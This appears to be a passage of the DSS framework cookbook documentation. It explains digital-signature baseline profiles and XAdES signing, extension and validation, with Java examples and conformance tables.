The different formats of the digital signature make it possible to cover a wide range of real-life use cases of this technique. Thus we distinguish the following formats: XAdES, CAdES, PAdES, JAdES and ASiC. To each one of them a specific standard is dedicated. The wide variety of options, settings and versions of the standards makes their interoperability very difficult. This is the main reason for which new standards, commonly called "baseline profiles", were published. Their goal is to limit the number of options and variants, thereby enabling better interoperability between different actors.

In general, it can be said that for each format of the digital signature the number of security levels defined in the new standards has been reduced. Below is a comparative table of old and new levels for each format of the signature:

[%header,cols=7*^.^]
.Signature supported profiles
|=======================
2+|XAdES 2+|CAdES 2+|PAdES |JAdES
|*STANDARD* |*BASELINE* |*STANDARD* |*BASELINE* |*STANDARD* |*BASELINE* |*BASELINE*
|XAdES-BES .2+|XAdES-B |CAdES-BES .2+|CAdES-B |PAdES-BES .2+|PAdES-B .2+|JAdES-B
|XAdES-EPES |CAdES-EPES |PAdES-EPES
|XAdES-T |XAdES-T |CAdES-T |CAdES-T |PAdES-T |PAdES-T |JAdES-T
|XAdES-XL |XAdES-LT |CAdES-XL |CAdES-LT |PAdES-XL |PAdES-LT |JAdES-LT
|XAdES-A |XAdES-LTA |CAdES-A |CAdES-LTA |PAdES-LTV |PAdES-LTA |JAdES-LTA
|=======================

Note that the new version (v4) of the DSS framework is compatible with the baseline profiles; it is no longer possible to use the standard profiles for signing purposes.
The validation of the signature still takes into account the old profiles.

[.landscape]
<<<

=== Signature profile guide

Below you can find a table specifying the various signature possibilities available with the DSS signature profiles/formats.
The vertical axis lists the available signature profiles and their variants. The horizontal axis lists the types of documents and features supported for signing.

.File formats and Signature types conformance
[%header,cols="12*^.^"]
|===
 3+|Signature profiles |XML |JSON |PDF |Binary |Digest |Multiple files |Multiple signatures |Counter signature |Stand-alone timestamp
.10+|XAdES .4+|Enveloping |Base64 encoded |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"]
 |Embed XML |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |XML only |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"]
 |Manifest |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"]
 |Canonicalization |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |XML only |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"]
 .4+|Enveloped |enveloped transformation |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"]
 |based on XPath |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"]
 |based on Filter2 |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"]
 |Canonicalization |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |icon:times-circle[role="red"] |XML only |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"]
 2+|Detached |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"]
 2+|Internally Detached |icon:check-circle[role="lime"]
|icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n.2+|CAdES 2+|Enveloping |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Detached |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n|PAdES 2+|Enveloped |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"]\n.6+|JAdES .3+|Enveloping |Compact Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"]\n |Flattened JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n .3+|Detached |Compact Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"]\n |Flattened JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n.2+|ASiC |ASiCS |CAdES \/ XAdES |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"]\n |ASiCE |CAdES \/ XAdES |icon:check-circle[role=\"lime\"] 
|icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:times-circle[role="red"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"] |icon:check-circle[role="lime"]
|===

[.portrait]
<<<

== The XML Signature (XAdES)

The simplest way to approach the digital signature is through the XAdES format. Indeed, it allows visualization of the signature content with a simple text editor. Thus it becomes much easier to make the connection between theoretical concepts and their implementation. Before embarking on the use of the DSS framework, it is advisable to read the following documents:

 * XAdES Specifications (cf. <<R01>>)

After reading these documents, it is clear that:

 * To electronically sign a document, a signing certificate (that proves the signer's identity) and access to its associated private key are needed.
 * To electronically validate a signed document, the signer's certificate containing the public key is needed. To give a more colourful example: when a digitally signed document is sent to a given person or organization in order to be validated, the certificate with the public key used to create the signature must also be provided.

=== XAdES Profiles

The new ETSI standard defines four conformance levels to address the growing need to protect the validity of the signature over time. Henceforth, the word "level" will be used to denote the conformance level of a signature. The levels defined in the standard are as follows:

 * XAdES-BASELINE-*B*: _Basic Electronic Signature_
The lowest and simplest version, just containing the SignedInfo, SignatureValue, KeyInfo and SignedProperties. This level combines the old -BES and -EPES levels.
This form extends the definition of an electronic signature to conform to the identified signature policy.
 * XAdES-BASELINE-*T*: _Signature with a timestamp_
A timestamp regarding the time of signing is added to protect against repudiation.
 * XAdES-BASELINE-*LT*: _Signature with Long Term Data_
Certificates and revocation data are embedded to allow verification in the future, even if their original source is not available. This level is equivalent to the old -XL level.
 * XAdES-BASELINE-*LTA*: _Signature with Long Term Data and Archive timestamp_
Periodic timestamping (e.g. each year) prevents the compromise that could be caused by the weakening of previous signatures during a long storage period. This level is equivalent to the old -A level.

NOTE: The old levels -BES, -EPES, -C, -X, -XL and -A are no longer supported when signing.

==== XAdES-BASELINE-B

To start, let's take a simple XML document:

[[xml_example.xml]]
[source,xml]
.xml_example.xml
----
<?xml version="1.0"?>
<test>Hello World !</test>
----

Since this is an XML document, we will use the XAdES signature, and more particularly the XAdES-BASELINE-B level, which is the lowest level of protection: just satisfying the Directive (cf. <<R07>>) legal requirements for an advanced signature. The normal signing process is to sign first at level -B or level -T, and later, when it becomes necessary, to complete the signature with the superior levels. However, the framework allows signing directly with any level.
When signing data, the resulting signature needs to be linked with the data to which it applies. This can be done either by creating a data set which combines the signature and the data (e.g.
by enveloping the data with the signature or including a signature element in the data set), or by placing the signature in a separate resource and having some external means for associating the signature with the data. So, we need to define the packaging of the signature, namely ENVELOPED, ENVELOPING, DETACHED or INTERNALLY-DETACHED. More information about the supported reference transformations for each signature packaging (except 'Detached') can be found in the section <<Reference Transformations>>.

 * *ENVELOPED :* when the signature applies to the data that surround it within the document;
 * *ENVELOPING :* when the signed data form a sub-element of the signature itself;
 ** Base64 encoded binaries;
 ** Embed XML object(s);
 ** Embed https://www.w3.org/TR/xmldsig-core/#sec-o-Manifest[Manifest] object(s).
 * *DETACHED :* when the signature relates to the external resource(s) separated from it;
 * *INTERNALLY-DETACHED :* when the signature and the related signed data are both included in a parent element (XML only).

For our example, we will use the ENVELOPED packaging.

The DSS framework uses 3 atomic steps to sign a document :

. Compute the digest to be signed;
. Sign the digest;
. Sign the document (add the signed digest).

The DSS framework fully manages steps 1 and 3; we only need to specify how the signature operation (step 2) is done. DSS offers some implementations in the dss-token module.

To write our Java code, we still need to specify the type of KeyStore to use for signing our document, or more simply, where the private key can be found. In the package "eu.europa.esig.dss.token", we can choose between different connection tokens :

 * *Pkcs11SignatureToken :* allows communicating with SmartCards through the PKCS#11 interface. It requires some installed drivers (dll, so,...).
 * *Pkcs12SignatureToken :* allows signing with a PKCS#12 keystore (.p12 file).
 * *MSCAPISignatureToken :* handles the signature with MS CAPI (the Microsoft interface to communicate with SmartCards).
 * *JKSSignatureToken :* allows signing with a Java Key Store (.jks file).

NOTE: The DSS framework also provides support for the MOCCA framework to communicate with smartcards via PC/SC, but it involves the installation of the MOCCA and IAIK libraries.

To know more about the use of the different signature tokens, please consult the "Management of Signature Tokens" chapter.

In our example, the class Pkcs12SignatureToken will be used. A file in PKCS#12 format must be provided to the constructor of the class. It contains a private key, accompanied by its X.509 public key certificate and protected by a password. The certification chain can also be included in this file. It is possible to generate dummy certificates and their chains with OpenSSL. Please visit http://www.openssl.org/ for more details.
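As an illustration, a Pkcs12SignatureToken could be instantiated as in the minimal sketch below; the keystore path and password are placeholders, and the exact constructor signature may vary slightly between DSS versions:

[source,java]
.Instantiating a Pkcs12SignatureToken (illustrative sketch)
----
// classes come from the eu.europa.esig.dss.token package;
// "keystore.p12" and "password" are placeholder values
try (Pkcs12SignatureToken token = new Pkcs12SignatureToken("keystore.p12",
		new KeyStore.PasswordProtection("password".toCharArray()))) {
	// list the private key entries available in the keystore
	List<DSSPrivateKeyEntry> keys = token.getKeys();
	DSSPrivateKeyEntry privateKey = keys.get(0);
}
----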
This is the complete code that allows you to sign our XML document.

[source,java,indent=0]
.Create a XAdES signature
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBTest.java[tags=demo]
----

What you may notice is that to sign a document we need to:

 * Create an object based on the SignatureParameters class. Generally, the number of specified parameters depends on the profile of the signature. This object also defines some default parameters.
 * Choose the profile, packaging and signature digest algorithm.
 * Indicate the private key entry to be used.
 * Instantiate the adequate signature service.
 * Carry out the signature process.

The encryption algorithm is determined by the private key and therefore cannot be enforced via the setter of the signature parameters object; doing so would cause an inconsistency in the signature, making its validation impossible. This setter can be used in a particular context where the signing process is distributed over different machines and the private key is known only to the signature value creation process. See the clause "Signing process" for more information.
In the case where the private key entry object is not available, it is possible to provide the signing certificate and its certificate chain, as in the following example:

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/Snippets.java[tags=demoCertificateChain]
----

Integrating the certificate chain in the signature simplifies the building of a prospective certificate chain during the validation process.

By default, the framework uses the current date and time as the signing date. In the case where it is necessary to indicate a different time, it is possible to use the setter "setSigningDate(Date)", as in the example:

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/Snippets.java[tags=demoSigningDate]
----

When the specific service is instantiated, a certificate verifier must be set. This object is used to provide four different sources of information:

 * the source of trusted certificates (based on the trusted list(s) specific to the context);
 * the source of intermediate certificates used to build the certificate chain up to the trust anchor. This source is only needed when these certificates are not included in the signature itself;
 * the source of OCSP;
 * the source of CRL.

In the current implementation, this object is only used when the -LT or -LTA profiles are created.
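The following minimal sketch shows how such a verifier could be wired; it assumes DSS 5.x class names (`CommonCertificateVerifier`, `OnlineCRLSource`, `OnlineOCSPSource`), the `trustedCertificateSource` and `adjunctCertificateSource` variables are placeholders, and the exact setter names may differ slightly between versions:

[source,java]
.Configuring a CertificateVerifier (illustrative sketch)
----
CommonCertificateVerifier certificateVerifier = new CommonCertificateVerifier();
// 1. trusted certificates (e.g. a TrustedListsCertificateSource)
certificateVerifier.setTrustedCertSources(trustedCertificateSource);
// 2. intermediate certificates, when they are not included in the signature itself
certificateVerifier.setAdjunctCertSources(adjunctCertificateSource);
// 3. and 4. the OCSP and CRL sources
certificateVerifier.setOcspSource(new OnlineOCSPSource());
certificateVerifier.setCrlSource(new OnlineCRLSource());
----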
===== Signing process

Once the signature parameters have been identified, the service object itself must be created. The service used will depend on the type of document to sign. In our case it is an XML file, so we will instantiate a XAdES service. The process of signing takes place in three stages. The first is the `getDataToSign()` method call, passing as parameters the document to be signed and the previously selected settings. This step returns the data which is going to be digested and encrypted. In our case it corresponds to the SignedInfo XMLDSig element.

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/Snippets.java[tags=demoSigningProcessGetDataToSign]
----

The next step is a call to the function `sign()`, which is invoked on the token object representing the KeyStore, and not on the service. This method takes three parameters. The first is the array of bytes that must be signed; it is obtained by the previous method invocation. The second is the algorithm used to create the digest; you have the choice between SHA1, SHA256 and SHA512 (this list is not exhaustive). And the last one is the private key entry.

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/Snippets.java[tags=demoSigningProcessSign]
----

The last step of this process is the integration of the signature value into the signature, and the linking of the signature to the signed document based on the selected packaging method. This is the method `signDocument()` on the service. We must pass three parameters to it: again the document to sign, the signature parameters, and the signature value obtained in the previous step.

This separation into three steps allows use cases where different environments have their precise responsibilities: specifically, the distinction between communicating with the token and executing the business logic.

When this breakdown of the process is not necessary, a single method call can be used instead, as in the following example:

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/Snippets.java[tags=demoSigningProcessSignDocument]
----

===== Additional attributes

For this type of signature (XAdES-BASELINE-B), it is possible to specify some additional attributes.

[[SignXmlXadesBPropertiesTest.java]]
[source,java,indent=0]
.XAdES signature with additional signed attributes
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBPropertiesTest.java[tags=demo]
----

In the XAdES format, the following types of Content Timestamp can be used:

 * AllDataObjectsTimeStamp - each time-stamp token within this property covers the full set of references defined in the Signature's SignedInfo element, excluding references of type "SignedProperties".
 * IndividualDataObjectsTimeStamp - each time-stamp token within this property covers selected signed data objects.

The code above produces the following signature:

.XAdES signature example
include::_samples/xades-b-properties.adoc[]

==== XAdES-BASELINE-T

XAdES-BASELINE-T is a signature for which there exists a trusted time associated with the signature. It provides the initial steps towards long term validity, and more specifically it provides protection against repudiation. This extension of the signature can be created either during the generation process or during the validation process. However, the case where these validation data are not added during the generation process should no longer occur. The XAdES-BASELINE-T trusted time indications must be created before the signing certificate has been revoked or expired, and close to the time that the XAdES signature was produced. The XAdES-BASELINE-T form must be built on a XAdES-BASELINE-B form. The DSS framework allows extending the old -BES and -EPES profiles to the new BASELINE-T profile; indeed, there is no difference in the structure of the signature.

To implement this profile of signature, you must indicate to the service the TSA source, which delivers for each Timestamp Request a Timestamp Response (RFC 3161, cf. <<R08>>) containing a timestamp token. Below is the source code that creates a XAdES-BASELINE-T signature.
For our example, we will use the Belgian provider and an instance of OnlineTSPSource (see the "TSP Sources" chapter for more details).

[source,java,indent=0]
.Create a XAdES-Baseline-T with an OnlineTSPSource
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesTWithOnlineSourceTest.java[tags=demo]
----

If the timestamp source is not set, a NullPointerException is thrown.

The SignatureTimeStamp mandated by the XAdES-T form appears as an unsigned property within the QualifyingProperties:

.XAdES Signature Timestamp
include::_samples/xades-signature-timestamp.adoc[]

==== XAdES-BASELINE-LT

This level has to prove that the certification path was valid, at the time of the validation of the signature, up to a trust point, according to the naming constraints and the certificate policy constraints from the "Signature Validation Policy". It will add the CertificateValues and RevocationValues unsigned properties to the signature. The CertificateValues element contains the full set of certificates that have been used to validate the electronic signature, including the signer's certificate. However, it is not necessary to include one of those certificates if it is already present in the ds:KeyInfo element of the signature. This is how the DSS framework behaves. In order to find the list of all the certificates and the list of all revocation data, an automatic process of signature validation is executed. To carry out this process, an object called CertificateVerifier must be passed to the service. The implementer must set some of its properties (e.g. a source of trusted certificates). The code below shows how to use the default parameters with this object. Please refer to "The Signature Validation" chapter for further information. It also includes an example of how to implement this level of signature:

[[SignXmlXadesLTTest.java]]
[source,java,indent=0]
.SignXmlXadesLTTest.java
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesLTTest.java[tags=demo]
----

The following XML segment will be added to the signature's qualified and unsigned properties:

.Validation data values
include::_samples/xades-revocation-data.adoc[]

NOTE: The use of online sources can significantly increase the execution time of the signing process. For testing purposes, you can create your own source of data.

In the last example, the CommonsHttpDataLoader is used to provide the communication layer for the HTTP protocol. Each source which needs to go through the network to retrieve data needs to have this component set.

==== XAdES-BASELINE-LTA

When the cryptographic data becomes weak and the cryptographic functions become vulnerable, the auditor should take steps to maintain the validity of the signature. The XAdES-BASELINE-LTA form uses a simple approach called "archive validation data". It adds additional time-stamps for archiving signatures in a way that they are still protected, but also to be able to prove that the signatures were validated at the time when the used cryptographic algorithms were considered safe. The time-stamping process may be repeated every time the protection used becomes weak. Each time-stamp needs to be affixed before either the signing key or the algorithms used by the TSA are no longer secure.
The XAdES-A form adds the ArchiveTimestamp element within the UnsignedSignatureProperties, which may contain several ArchiveTimestamp elements.

Below is an example of the implementation of this level of signature (but in practice, we will rather extend the signature to this level when there is a risk that the cryptographic functions become vulnerable, or when one of the certificates approaches its expiration date):

[source,java,indent=0]
.Signature level setting
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/Snippets.java[tags=demoSignatureLevel]
----

The following XML segment will be added to the signature's qualified and unsigned properties:

.XAdES Archive Timestamp
include::_samples/xades-archive-timestamp.adoc[]

=== Versions support

DSS supports the following XAdES formats :

[cols="5*^"]
.Supported XAdES versions
|===
| | B-level | T-level | LT-level | LTA-level

| XAdES 1.1.1 | icon:check-circle[role="lime"] | icon:check-circle[role="lime"] | icon:check-circle[role="lime"] | icon:times-circle[role="red"]

| XAdES 1.2.2 | icon:check-circle[role="lime"] | icon:check-circle[role="lime"] | icon:check-circle[role="lime"] | icon:times-circle[role="red"]

| XAdES 1.3.2 | icon:check-circle[role="lime"] | icon:check-circle[role="lime"] | icon:check-circle[role="lime"] | icon:check-circle[role="lime"]

| XAdES 1.4.1 4+| The format contains qualifying properties for the XAdES 1.3.2 LTA level
|===

The XAdES profile, as well as customizable prefixes, can be set with the following methods :

[source,java,indent=0]
.XAdES formats and prefixes
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBWithTransformsTest.java[tags=demoPrefixes]
----

=== Reference Transformations

In the case of 'Enveloping', 'Enveloped' and 'Internally Detached' signatures, it is possible to apply custom transformations to the signing references in order to compute a proper digest result. An example of defining reference transformations can be found below:

[[SignXmlXadesBWithTransformsTest.java]]
[source,java,indent=0]
.Custom transformations definition
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBWithTransformsTest.java[tags=demo]
----

The current version of DSS supports the following transformations:

 * Enveloped - removes the current `Signature` element from the digest calculation of the reference.

WARNING: The Enveloped Signature Transform does not support parallel signatures!

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedTransform]
----

 * Canonicalization - any canonicalization algorithm that can be used for 'CanonicalizationMethod' can be used as a transform:

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBWithTransformsTest.java[tags=demoCanonicalizationTransform]
----

 * Base64 - the transform is used if an application needs to sign RAW data (binaries, images, audio or other formats).
The 'Base64 Transform' is not compatible with the following signature parameters:

 ** a reference containing more than one transform (the Base64 transform must be the sole element of the reference transforms);
 ** setEmbedXML(true) - the embedded XML setting cannot be used;
 ** setManifestSignature(true) - as is apparent from the previous point, a Manifest cannot be used with the Base64 Transform either, since it must also be embedded into the signature.

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBWithTransformsTest.java[tags=demoBase64Transform]
----

 * XPath - allows signing custom nodes of a signature or an embedded document. DSS contains an additional class `XPathEnvelopedSignatureTransform` which allows excluding signatures from the digested content (used for Enveloped signatures by default). Additional information about the 'XPath Transform' can be found https://www.w3.org/TR/xpath20/[at this link].

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedXPathTransform]
----

 * XPath-2-Filter - an alternative to the 'XPath Transform'. Additional information about the 'XPath2Filter Transform' can be found https://www.w3.org/TR/xmldsig-filter2/[at this link]. DSS contains an additional class `XPath2FilterEnvelopedSignatureTransform` which allows excluding signatures from the digest calculation.

NOTE: Since DSS 5.7, the XPath-2-Filter transform is used by default for the ENVELOPED signature packaging.

[source,java,indent=0]
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedXPath2FilterTransform]
----

 * XSLT Transform - this transform requires an `org.w3c.dom.Document` as input, compatible with the normative https://www.w3.org/TR/xslt-30/[XSLT Specification]. Must be a sole transform.

NOTE: All transformations, except Base64, can be applied only to XML objects.

=== Multiple signatures

In everyday life, there are many examples where it is necessary to have multiple signatures covering the same document, such as a contract to purchase a vehicle. Independent signatures are parallel signatures where the ordering of the signatures is not important. The computation of these signatures is performed on exactly the same input, but using different private keys.

=== XAdES and specific schema version

Some signatures may have been created with an older version of the XAdES standard, using a different schema definition. To take into account the validation of such signatures, the interface eu.europa.esig.dss.xades.definition.XAdESPaths was created. This interface allows providing the different needed XPath expressions which are used to explore the elements of the signature. The DSS framework proposes 3 implementations :

 * XAdES132Paths (XAdES 1.3.2 / 1.4.1)
 * XAdES122Paths (XAdES 1.2.2)
 * XAdES111Paths (XAdES 1.1.1)

By default, all versions of XAdES are supported, and DSS loads/parses all of them.
It is possible to restrict support to only one version of XAdES with the following code :

[source,java,indent=0]
.Customize the supported XAdES version(s) at the validation
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/validate/XAdES132OnlyTest.java[tags=demo]
----

=== Sign a Trusted List

The standard ETSI TS 119 612 specifies in its annex B the XML structure and the format of the signature (XAdES, enveloped signature, transformation, canonicalization, etc.). With the class `TrustedListSignatureParametersBuilder`, DSS is able to pre-configure the signature parameters to comply with the specifications and to simplify the signature creation.

[source,java,indent=0]
.Sign a Trusted List with the TrustedListSignatureParametersBuilder
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignTrustedListTest.java[tags=demo]
----

== Signature Extension

The -B level contains immutable signed properties. Once this level is created, these properties cannot be changed.

The levels -T/-LT/-LTA add unsigned properties to the signature. This means that the properties of these levels can be added afterwards to any AdES signature. This addition helps to make the signature more resistant to cryptographic attacks over a longer period of time. The extension of the signature is incremental, i.e. when you want to extend the signature to the level -LT, the lower level (-T) will also be added. The whole extension process is implemented by reusing components from the signature production. To extend a signature, we proceed in the same way as when creating a signature, except that the function "extendDocument" has to be called instead of the "sign" function. Note that when the document is signed with several signatures, then they are all extended.

=== BASELINE-T

The AdES-BASELINE-T trusted time indications have to be created before a certificate has been revoked or expired, and close to the time that the AdES signature was produced. It provides protection against repudiation. The framework adds the timestamp only if there is none yet, or if there is one but the creation of a new -T level extension is deliberate (using another TSA). It is not possible to extend a signature which already incorporates a higher level such as -LT or -LTA. In theory it would be possible to add another -T level when the signature has already reached level -LT, but the framework prevents this operation. Note that if the signed document contains multiple signatures, then all the signatures will be extended to level -T. It is also possible to sign a document directly at level -T.

Here is an example of creating an extension of type T:

[source,java,indent=0]
.Extend a XAdES signature
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/ExtendSignXmlXadesBToTTest.java[tags=demo]
----

Here is the result of adding a new extension of type -T to an already existing -T level signature:

.XAdES Unsigned Signature Properties
include::_samples/xades-extend-t-to-t.adoc[]

=== BASELINE-LT and -LTA

For these types of extensions, the procedure to follow is the same as in the case of the extension of type T. Please refer to the chapter XAdES Profiles to know the specific parameters which must be set for each level of signature.
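As an illustration, extending an existing signature to the -LTA level could look like the following minimal sketch; it assumes a XAdESService on which a CertificateVerifier and a TSP source have already been set, as required for the -LT/-LTA levels:

[source,java]
.Extending a signature to XAdES-BASELINE-LTA (illustrative sketch)
----
// signedDocument is the previously signed DSSDocument
XAdESSignatureParameters parameters = new XAdESSignatureParameters();
parameters.setSignatureLevel(SignatureLevel.XAdES_BASELINE_LTA);

// the lower levels (-T, -LT) are added automatically during the extension
DSSDocument extendedDocument = service.extendDocument(signedDocument, parameters);
----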
[[signatureValidation]]
== Signature Validation

Generally, and following the ETSI standard, the validation process of an electronic signature must provide one of the three following statuses: TOTAL-FAILED, TOTAL-PASSED or INDETERMINATE. A TOTAL-PASSED response indicates that the signature has passed verification and that it complies with the signature validation policy. A TOTAL-FAILED response indicates that either the signature format is incorrect or that the digital signature value fails the verification. An INDETERMINATE validation response indicates that the format and digital signature verifications have not failed, but that there is insufficient information to determine if the electronic signature is valid. For each of the validation checks, the validation process must provide information justifying the reasons for the resulting status indication as a result of the check against the applicable constraints. In addition, the ETSI standard defines a consistent and accurate way for justifying statuses under a set of sub-indications.

=== Validation Process

Since version 4.7 of the DSS framework, the validation process is based on the latest ETSI standard <<R09>>. It is driven by the validation policy and allows long term signature validation. It not only verifies the existence of certain data and their validity, but it also checks the temporal dependencies between these elements. The signature check is done following basic building blocks. On the simplified diagram below, showing the process of the signature validation, you can follow the relationships between the building blocks, each of which represents a logical set of checks used in the validation process.

.Signature Validation Process
image::sig_validation_process.jpg[]

Note that the current version of the framework does not indicate, during the validation process, which part of a document was signed. However, in the case of a XAdES signature, the XPath transformations present in the signature will be applied; in the case of a CAdES or PAdES signature, the whole document must be signed.

At the end of the validation process four reports are created. They contain different levels of detail concerning the validation result. They provide four kinds of views of the validation process: macroscopic, microscopic, input data, and an ETSI Validation report conformant with the standard <<R09>>. For more information about these reports, please refer to the "Simple Report" chapter.

Below is the simplest example of the validation of the signature of a document. The first thing to do is to instantiate an object named validator, which orchestrates the verification of the different rules. To perform this, it is necessary to invoke the static method fromDocument() on the abstract class `SignedDocumentValidator`. This method returns the object in question, whose type is chosen dynamically based on the type of the source document.

The next step is to create an object that will check the status of a certificate using the Trusted List model (see "Trusted Lists of Certification Service Provider" for more information). In order to achieve this, an instance of a `CertificateVerifier` must be created with a defined source of trusted certificates. In our example, the trusted source is instantiated with the `CommonTrustedCertificateSource` class.
As well as a trusted source, the CertificateVerifier object needs an OCSP and/or CRL source and a TSL source (which defines how the certificates are retrieved from the Trusted Lists). See the chapter "Management of CRL and OCSP Sources" for more information concerning the sources.

[source,java,indent=0]
.Validation of a signature
----
